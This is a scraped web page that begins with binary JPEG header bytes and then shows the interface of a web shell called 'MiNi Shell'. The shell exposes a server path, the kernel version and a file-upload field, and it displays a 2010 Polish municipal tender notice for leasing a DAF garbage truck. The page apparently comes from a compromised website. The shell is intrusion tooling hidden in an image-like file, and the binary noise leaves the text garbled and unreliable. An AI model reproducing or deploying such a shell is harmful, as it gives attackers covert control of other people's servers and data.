JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100113/10660-N-2010.html

<p class="kh_header"><b>Ostróda: Dostawa w formie leasingu operacyjnego śmieciarki na podwoziu samochodu ciężarowego DAF ze zgniotem 6:1 o pojemności skrzyni ładunkowej minimum 16 m3 z opcją wykupu</b><br>
<b>Numer ogłoszenia: 10660 - 2010; data zamieszczenia: 13.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Unieszkodliwiania Odpadów Komunalnych Rudno Sp. z o.o. , ul. Stępowskiego 10, 14-100 Ostróda, woj. warmińsko-mazurskie, tel. 089 644 12 44, faks 089 648 41 82.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zuokrudno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka komunalna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa w formie leasingu operacyjnego śmieciarki na podwoziu samochodu ciężarowego DAF ze zgniotem 6:1 o pojemności skrzyni ładunkowej minimum 16 m3 z opcją wykupu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ŚMIECIARKA  NA PODWOZIU SAMOCHODU CIĘŻAROWEGO 
DAF ze ZGNIOTEM 6:1 o POJEMNOŚCI SKRZYNI ŁADUNKOWEJ min. 16 m3
Charakterystyka zabudowy  :
- zabudowa skrzyniowa z urządzeniem załadowczym tylnym, przeznaczona do zbierania stałych odpadów gromadzonych w pojemnikach komunalnych, surowców wtórnych i odpadów wielkogabarytowych,
- zabudowa montowana na dzielonej ramie, połączona elastycznie z podwoziem
- skrzynia ładunkowa o owalnych kształtach, wykonana z jednolitych blach
- podłoga skrzyni ładunkowej o owalnych kształtach,
- pojemność skrzyni ładunkowej min. 16m3   
- objętość kosza zasypowego min. 2,8 m3   
- króciec odpływowy w wannie załadowczej z zaworem kulowym, 
- mechanizm zgniatania liniowo - płytowy (szufladowy)
- prowadnice płyty wypychającej umieszczone na ścianach zabudowy
- możliwość wysunięcia płyty wypychającej poza skrzynię ładunkową celem dokładnego oczyszczenia skrzyni
- urządzenie do otwierania pokryw pojemników sterowane elektryczno - pneumatycznie
- możliwość sterowania mechanizmem załadowczym w cyklu automatycznym, ciągłym oraz pojedynczym
- urządzenie zapobiegające uszkodzeniu pojemników podczas opróżniania 
- możliwość sterowania urządzeniem zasypowym umieszczonym po obu stronach odwłoka,
- możliwość sterowania płytą wypychającą (wysuwanie i wsuwanie) z kabiny kierowcy
- układ uwalniania zakleszczonych przedmiotów,
- dwa wyłączniki bezpieczeństwa (stop awaryjny) umieszczone po obu stronach zabudowy, 
- automatyczne sterowanie obrotami silnika w zależności od obciążenia układu hydraulicznego,
- stopień zagęszczenia odpadów  6:1,
- możliwość zmiany ciśnienia (stopnia zagęszczenia) w układzie hydraulicznym na mniejszą; ok. (40 bar) - wariant: surowce wtórne, odpady zielone. Sterowanie odbywa się z kabiny kierowcy,
- załadunek tylny
- krawędź kosza zasypowego z otwieraną klapa  umożliwiająca ręczny załadunek odpadów niewymiarowych i wielkogabarytowych (możliwość obniżenia krawędzi kosza zasypowego )
- urządzenie załadowcze uniwersalne dostosowane do współpracy z pojemnikami 80 do 1100 litrów  
- część tylna (odwłok) z automatyczną blokadą i odblokowywaniem,
- automatyczne urządzenie do otrzepywania pojemników 
- osłony przeciw najazdowe dla ładowaczy 
- osłony i kurtyny przeciw pylne dla ładowaczy
-dwa stopnie dla ładowaczy wraz z czujnikami automatycznie informującymi kierowcę o tym który stopień jest zajęty oraz dającymi możliwość :
	-	ograniczenia prędkości do 30 km/h,
	-	uniemożliwienia  manewru cofania pojazdu,
	-          rozłączenia układu ugniatania,
-dwa siłowniki prasy zgniatającej umieszczone na zewnątrz odwłoka,( dłuższa żywotność)
-uszczelka zamontowana dookoła płyty zgniatającej (idealnie czyste wnętrze skrzyni ładunk.)
-rura odpływowa ze zbiornikiem na Bio odcieki (w najniższym punkcie dna skrzyni ładunkowej),
-kamera umieszczona z tyłu zabudowy oraz monitor  w kabinie kierowcy,
-zabudowa wielokrotnie gruntowana i lakierowana, zabezpieczona antykorozyjnie,  
-oświetlenie wg obowiązujących obecnie przepisów: światła hamowania, postojowe, kierunkowskazy oraz światło alarmowe /kogut/ z  tyłu pojazdu,
-reflektor roboczy z tyłu zabudowy,
-pasy odblaskowe ( ostrzegawcze ) na kabinie i odwłoku,
-dno zbiornika wykonane ze stali wysokogatunkowej typu Hardox o grubości min. 6 mm
-dno skrzyni załadowczej wykonane z stali wysokogatunkowej typu Hardox o grubości min. 8 mm
-możliwość odczytu w urządzeniu rejestrującym liczby cykli pracy: prasy zagęszczającej, podnoszenia, opuszczania odwłoka oraz czasu pracy pompy hydraulicznej przez osoby nadzorujące pracę obsługi  
-możliwość wykonania auto diagnozy sprawności układu elektrycznego przez kierowcę
-czujnik przeciążeniowy chroniący konstrukcję zabudowy
-możliwość ręcznego sterowania cyklem zgniatania (4 przyciski)
-zabudowa z systemem CAN - BUS odpowiadająca najnowszym wytycznym CE
-Kolorystyka zabudowy - pomarańcz RAL 2011

Charakterystyka podwozia:
-podwozie samochodu DAF
-rok produkcji 2008 lub młodsze
-przebieg do 10 000 km
-ilość godzin pracy zabudowy nie więcej aniżeli 80 mtg
-moc silnika min. 180 kW
-silnik typu Diesla
-napęd na oś tylną z blokadą mechanizmu różnicowego
-skrzynia biegów manualna
-dopuszczalna masa całkowita pojazdu do 19 000kg
-układ hamulcowy dwuobwodowy
-wentylowane hamulce tarczowe przód i tył
-hamulec wydechowy
-układ dwuobwodowy
-sprężarka powietrza z osuszaczem podgrzewanym
-elektroniczny miernik zużycia paliwa (przepływomierz)
-wyposażenie w trójkąt, apteczkę, skrzynkę narzędziową z kpl. kluczy
-gaśnica z atestem w kabinie + 6 kg na odwłoku zabudowy
-koło zapasowe, kliny pod koła 2 sztuki,
-podnośnik hydrauliczny min. 20 ton,
-przewód do pompowania kół 10-cio metrowy z manometrem i z zaworami do podłączenia,
-belka świetlna pomarańczowa z napisem ZUOK RUDNO
-kabina koloru białego
-kabina wyposażona w wywietrznik dachowy
-lusterka główne i szerokokątne podgrzewane i regulowane elektrycznie
-elektrycznie otwierane szyby
-akustyczny, ostrzegawczy sygnał cofania z wyłącznikiem bezpieczeństwa
-emisja spalin min. Euro 4
-rura wydechowa do góry
-układ zawieszenia przedniej osi resorowe z amortyzatorem i stabilizatorem, tył na poduszkach powietrznych regulowanych,
-komplet dokumentów wymaganych do rejestracji, eksploatacji pojazdu i wymaganych obowiązującymi przepisami prawa, specyfikacja na rynek krajowy,
-odpowiadający warunkom użytkowym, techniczno-eksploatacyjnym i przepisom BHP dla tego typu pojazdów,
-książka gwarancyjna, deklaracje zgodności, świadectwa, książka i karta pojazdu, instrukcje obsługi - w języku polskim,
-serwis gwarancyjny i pogwarancyjny,
-gwarancja na kompletny pojazd min. 24 miesiące,
-w okresie gwarancji usunięcie usterek niezwłocznie,
-czas serwisu max. 24 godziny od momentu zgłoszenia,
-pełny serwis zaopatrzenia w części zamienne przez okres min. 15 lat
-przeszkolenie obsługi pojazdu,

Aspekty prawne 

Emisja spalin Euro min. 4 

Układ diagnostyki pokładowej spełniający wymagania dyrektywy UE 2005/78/WE w celu zapewnienia pracy silnika zgodnej z wymaganymi prawnie ograniczeniami emisji spalin. 

Zakres dostawy: 

Dostawa do siedziby Zamawiającego.

Instrukcja Eksploatacji i Konserwacji (instrukcja obsługi, charakterystyka techniczna urządzenia, instrukcja BHP, instrukcja przeglądów, konserwacji, karta gwarancyjna urządzenia) 

Deklaracja zgodności dla wymogów CE dla maszyn i urządzeń 

Dziennik Konserwacji 

Przeprowadzenie szkolenia wyznaczonych pracowników w zakresie prawidłowego i bezpiecznego eksploatowania urządzenia. 

Dokumentacja umożliwiająca rejestracje pojazdu (homologacja lub świadectwo badania jednostkowego) 

Warunki gwarancji i serwisu:

24 miesiące bez limitu kilometrów; bezpłatny serwis w okresie trwania gwarancji obejmujący pełny zakres obsług i napraw (wraz z materiałami eksploatacyjnymi i kosztami dojazdu) 


Pojazd musi posiadać:  

świadectwa homologacji pojazdu wraz z zabudową niezbędne do wglądu przez Zamawiającego podczas testowania i demonstracji pojazdu. 

świadectwo homologacji dla kompletnego pojazdu ważne w dniu składania oferty. 

niezbędne regulacje i pomiary dopuszczające samochód do użytkowania, niezbędną dokumentację w języku polskim i pozwolenia określone prawem dla eksploatacji (również pod względem BHP) zgodnie z Rozporządzeniem Ministra Środowiska z dnia 16 czerwca 2009r w sprawie bezpieczeństwa i higieny pracy przy gospodarowaniu odpadami komunalnymi (Dz. U z dnia 1 lipca 2009r)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 34.14.45.10-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępując do przetargu zobowiązany jest do wniesienia wadium w wysokości 
    10 000 PLN. 

2. Wadium może być wnoszone w jednej lub kilku następujących formach: 

a) pieniądzu; 

b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 

c) gwarancjach bankowych; 

d) gwarancjach ubezpieczeniowych; 

e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z póź. zm.). 

3. Wadia wnoszone w pieniądzu należy wpłacić na rachunek bankowy Zakładu Unieszkodliwiania Odpadów Komunalnych RUDNO Sp. z o.o.
w Bank Millenium Nr konta: 49 1160 2202 0000 0001 1609 1559

4. Wadium wnosi się przed upływem terminu składania ofert. 

5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym, 

6. Zamawiający zwraca niezwłocznie wadium, jeżeli: 

a) upłynął termin związania ofertą; 

b) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy; 

c) Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia. 

7. Z zastrzeżeniem art.46 ust.4a ustawy, Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy: 

a) który wycofał ofertę przed upływem terminu składania ofert; 

b) który został wykluczony z postępowania; 

c) którego oferta została odrzucona. 

8. Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie art.46 ust 2 pkt. 2 i 3, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia Wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego. 

9. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 

10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 

11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 

a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 

b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 

c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 

12. Nie wniesienie wadium lub wniesienie wadium po terminie składania ofert spowoduje wykluczenie Wykonawcy z postępowania.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W postępowaniu mogą wziąć udział Wykonawcy spełniający warunki określone w ppkt. 2 niniejszego rozdziału, którzy złożą wymagane oświadczenia i dokumenty. 

2. O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy: 

1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 

2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; 

3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 

4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 Prawa zamówień publicznych; 

3. Celem potwierdzenia spełnienia warunków udziału w postępowaniu, o których mowa w ppkt. 2, Wykonawca zobowiązany jest złożyć następujące dokumenty: 

1) pisemne oświadczenie o spełnieniu warunków udziału w postępowaniu (zał. nr 2 do specyfikacji istotnych warunków zamówienia); 

2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 

3) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 

4) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 PZP, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 

5) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 PZP, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

6) wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonanych, dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom lub usługom stanowiącym przedmiot zamówienia, z podaniem wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenie dokumentów potwierdzających, że te dostawy lub usługi zostały wykonane należycie - referencje, 

7) informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, albo składania ofert, 

4. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie oświadczeń i dokumentów, o których mowa w ppkt. 3, metodą spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Do oferty należy dołączyć następujące dokumenty: 

1) formularz oferty cenowej - zał. nr 1 do specyfikacji istotnych warunków zamówienia; 

2) pisemne oświadczenie o spełnieniu warunków udziału w postępowaniu (zał. nr 2 do specyfikacji istotnych warunków zamówienia); 

3) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 

4) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 

5) umowę regulującą współpracę podmiotów występujących wspólnie (dotyczy w szczególności umowy spółki cywilnej, umowy konsorcjum itp.); 

6) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 

7) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 PZP, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 

8) wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonanych, dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom lub usługom stanowiącym przedmiot zamówienia, z podaniem wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenie dokumentów potwierdzających, że te dostawy lub usługi zostały wykonane należycie - referencje; 

9) informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, albo składania ofert; 

10) opis techniczny oferowanego pojazdu 

Zaoferowany pojazd musi odpowiadać wszystkim wymogom zawartym w opisie przedmiotu zamówienia (punkt 3 niniejszej specyfikacji istotnych warunków zamówienia). 

11) dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 

12) dowód wniesienia wadium, tj.: kopia dokonania przelewu na konto Zamawiającego albo kopia zdeponowanej w kasie Zamawiającego gwarancji lub poręczenia. 

2. Do oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia należy załączyć: 

1) dokumenty określone w ust.1, 

2) pełnomocnictwo dla pełnomocnika, o którym mowa w pkt.8 ust.2,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zuokrudno.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Biurze Zamawiajacego, ul. Stępowskiego 10, 14-100 Ostróda.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2010 godzina 11:15, miejsce: Biuro Zamawiajacego, ul. Stępowskiego 10, 14-100 Ostróda.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com